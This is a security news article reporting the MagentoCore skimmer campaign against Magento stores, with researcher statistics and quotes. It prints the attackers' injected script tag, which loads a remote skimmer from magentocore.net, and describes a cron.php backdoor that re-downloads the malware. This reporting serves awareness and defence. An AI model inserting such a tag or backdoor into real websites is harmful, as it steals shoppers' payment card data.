MagentoCore skimmer already infected 7,339 Magento stores

MagentoCore skimmer already infected 7,339 Magento stores, according to the Willem de Groot who uncovered the campaign, it is the most aggressive to date.

The cybersecurity researcher Willem de Groot has uncovered a massive hacking campaign aimed at Magento stores. The hackers have already infected 7,339 Magento stores with a skimmer script, dubbed MagentoCore, that siphons payment card data from users who purchased on the sites.

Threat actors behind this campaign managed to compromise the websites running Magento and injected the payment card scraper in its source code.

Crooks attempts to access the control panel of Magento stores with brute force attacks.

At the time of writing, querying the PublicWWW service we can verify that the MagentoCore script is currently deployed on 5,214 domains.

The malicious script loads on store checkout pages and steals payment card details provided by the users and send it to a server controlled by the attacker.

Willem de Groot reported that the hacking campaign is involving a skimmer script loaded from the magentocore.net domain.

“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.

The expert found the MagentoCore script on 7,339 Magento stores in the past six months, the campaign is still ongoing and hackers are compromising new Magento stores at a pace of 50 to 60 sites per day.

“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.

Once the attackers succeed in compromising a website, it will add an embedded piece of Javascript to the HTML template:

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to “magentocore.net” server.

The expert noticed that the malware implements a recovery mechanism, in case of the Magento software, it adds a backdoor to cron.php that will periodically download the malicious code, and, after running, delete itself.

“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.

“But the real victims are eventually the customers, who have their card and identity stolen.”

According to Bleeping Computer that quoted Yonathan Klijnsma, Threat Researcher Lead for RiskIQ, the MagentoCore campaign is actually part of a larger card scraping campaign known as MageCart that been active since late 2015.

According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmer scripts.

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(Securi ty Affairs – data breached, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.